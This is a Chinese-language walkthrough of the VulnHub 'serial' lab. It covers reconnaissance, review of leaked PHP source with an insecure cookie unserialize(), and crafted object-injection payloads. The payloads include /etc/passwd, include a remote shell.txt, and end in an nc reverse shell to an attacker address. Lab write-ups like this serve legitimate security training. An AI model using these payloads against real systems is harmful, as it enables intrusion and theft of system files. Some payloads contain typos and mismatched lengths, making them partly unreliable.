这次我们来做这个靶场

项目地址https://download.vulnhub.com/serial/serial.zip

使用vm新建虚拟机

以下为注意事项

第一步，收集资产

扫描靶场ip

netdiscover -i eth0 -r 192.168.177.0/24

抓个包

扫描目录

看到了cookie中有一个user

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086NzoiV2VsY29tZSI6MDp7fX0%3D

去问问ai这是像是编码

O:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";O:7:"Welcome":0:{}}

看不懂，算了，爆破目录吧

dirsearch一下

下载他的备份，发现三个文件，看一看

这是每个php文件，并使用ai加了注释

index.php

<?php// 引入用户类文件 user.class.phpinclude("user.class.php");// 如果 $_COOKIE['user'] 未设置if(!isset($_COOKIE['user'])) {// 设置 cookie，使用 base64 编码和序列化后的用户对象setcookie("user", base64_encode(serialize(new User('sk4'))));} else {// 如果 $_COOKIE['user'] 已设置，则尝试反序列化并解码unserialize(base64_decode($_COOKIE['user']));}// 输出一条消息，说明这是一个新 cookie 处理器的测试版echo "This is a beta test for new cookie handler\n";
?>

log.class.php

<?phpclass Log {private $type_log; // 私有属性，用于存储日志类型的文件路径或句柄function __costruct($hnd) { // 构造函数，接受一个参数用于设置日志类型$this->$type_log = $hnd; // 将传入的日志类型参数赋值给类的属性 $type_log}public function handler($val) { // 公共方法，用于处理日志include($this->type_log); // 动态包含类属性 $type_log 指定的文件echo "LOG: " . $val; // 输出日志信息，格式为 "LOG: " 后跟 $val 的值}}
?>

user.class.php

<?phpinclude("log.class.php"); // 引入日志类文件 log.class.phpclass Welcome {public function handler($val) {echo "Hello " . $val; // 输出欢迎信息，格式为 "Hello " 后跟参数 $val 的值}}class User {private $name; // 私有属性，用于存储用户名private $wel;  // 私有属性，用于存储 Welcome 类的实例对象function __construct($name) { // 构造函数，接受一个参数 $name 用于设置用户名$this->name = $name; // 将传入的 $name 参数赋值给类的属性 $name$this->wel = new Welcome(); // 创建 Welcome 类的实例对象，并赋值给属性 $wel}function __destruct() { // 析构函数，在对象销毁时自动调用//echo "bye\n"; // 注释掉的代码，本意是在对象销毁时输出 "bye"$this->wel->handler($this->name); // 调用 Welcome 类的 handler 方法，向其传递当前对象的用户名参数 $this->name}}?>

审计完成代码，我们对抓包内容进行更改

O:4:"User":2:{s:10:"Username";s:5:"admin";s:9:"Userwel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}

加码

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ==

构造语句

O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:25:"http://192.168.3.237/shell.txt";}}

/?cmd=rm+tmp/f%3bmkfifo+/tmp/f%3bcat+/tmpf|/bin/sh+-i+2>%261|nc+192.168.177.142+4444+>/tmp/f

网上找的攻击语句